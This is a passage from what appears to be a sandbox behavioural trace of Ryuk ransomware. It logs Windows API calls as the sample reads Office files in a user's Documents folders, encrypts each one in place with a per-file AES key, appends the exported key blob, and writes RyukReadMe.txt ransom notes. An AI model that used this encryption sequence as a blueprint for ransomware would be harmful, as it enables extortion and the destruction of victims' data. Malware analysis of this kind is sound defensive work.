lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.728] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x5c30, lpOverlapped=0x0) returned 1 [0154.728] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0154.728] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0154.729] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0154.729] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0154.729] CloseHandle (hObject=0x19c) returned 1 [0154.744] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.748] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.748] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.749] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0154.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.749] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\oJ4D06 VFJ\\yQciyD.ppt", dwFileAttributes=0x80) returned 1 [0154.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\oJ4D06 VFJ\\yQciyD.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\oj4d06 vfj\\yqciyd.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0154.749] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=75625) returned 1 [0154.749] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=75625) returned 1 [0154.749] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x12647, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.749] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0154.750] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.750] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0154.750] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.750] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.750] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12769, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x12769, lpOverlapped=0x0) returned 1 [0154.752] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0154.752] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x12769, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x12770) returned 1 [0154.753] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.753] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12770, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x12770, lpOverlapped=0x0) returned 1 [0154.753] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0154.753] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0154.753] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0154.753] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0154.753] CloseHandle (hObject=0x19c) returned 1 [0154.825] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.829] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.829] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.829] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0154.829] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0154.829] SetLastError (dwErrCode=0x0) [0154.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\oJ4D06 VFJ\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\oj4d06 vfj\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.864] GetLastError () returned 0x0 [0154.864] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0154.865] CloseHandle (hObject=0x198) returned 1 [0154.865] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.865] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\r_QeLNqLHC.odt", dwFileAttributes=0x80) returned 1 [0154.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\r_QeLNqLHC.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\r_qelnqlhc.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.866] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=23863) returned 1 [0154.866] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=23863) returned 1 [0154.866] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5c15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.866] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.866] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.866] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.866] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.867] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.867] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5d37, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5d37, lpOverlapped=0x0) returned 1 [0154.867] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.867] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5d37, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5d40) returned 1 [0154.867] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.867] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5d40, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5d40, lpOverlapped=0x0) returned 1 [0154.867] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.867] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.867] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.867] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.868] CloseHandle (hObject=0x198) returned 1 [0154.901] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.905] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.905] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.905] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.905] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.906] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\W lE.xls", dwFileAttributes=0x80) returned 1 [0154.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\W lE.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\w le.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.906] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=22598) returned 1 [0154.906] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=22598) returned 1 [0154.906] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x5724, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.906] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.909] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.909] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.909] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.909] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.909] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5846, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5846, lpOverlapped=0x0) returned 1 [0154.910] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.910] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5846, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5850) returned 1 [0154.910] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.910] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5850, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5850, lpOverlapped=0x0) returned 1 [0154.910] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.910] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.910] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.910] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.910] CloseHandle (hObject=0x198) returned 1 [0154.929] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.933] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.933] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.934] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0154.934] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0154.934] SetLastError (dwErrCode=0x0) [0154.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0154.934] GetLastError () returned 0xb7 [0154.934] CloseHandle (hObject=0x194) returned 1 [0154.934] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0154.934] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0154.934] SetLastError (dwErrCode=0x0) [0154.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0154.934] GetLastError () returned 0xb7 [0154.934] CloseHandle (hObject=0x190) returned 1 [0154.934] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0154.934] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.934] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\jXN3C.xlsx", dwFileAttributes=0x80) returned 1 [0154.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\jXN3C.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\jxn3c.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0154.935] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=86504) returned 1 [0154.935] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=86504) returned 1 [0154.935] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x150c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.935] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0154.936] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.936] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0154.936] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.936] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.936] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x151e8, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x151e8, lpOverlapped=0x0) returned 1 [0154.937] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0154.937] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x151e8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x151f0) returned 1 [0154.938] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.938] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x151f0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x151f0, lpOverlapped=0x0) returned 1 [0154.938] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0154.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0154.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0154.948] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0154.948] CloseHandle (hObject=0x190) returned 1 [0154.962] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.966] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.966] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.966] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0154.966] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0154.966] SetLastError (dwErrCode=0x0) [0154.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0154.966] GetLastError () returned 0xb7 [0154.966] CloseHandle (hObject=0x18c) returned 1 [0154.966] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0154.966] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.967] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\r -91a57TaPk2NEbS5.docx", dwFileAttributes=0x80) returned 1 [0154.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\r -91a57TaPk2NEbS5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\r -91a57tapk2nebs5.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0154.967] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=86190) returned 1 [0154.967] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=86190) returned 1 [0154.967] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x14f8c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.967] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0154.968] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.968] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0154.968] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.968] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.968] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x150ae, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, 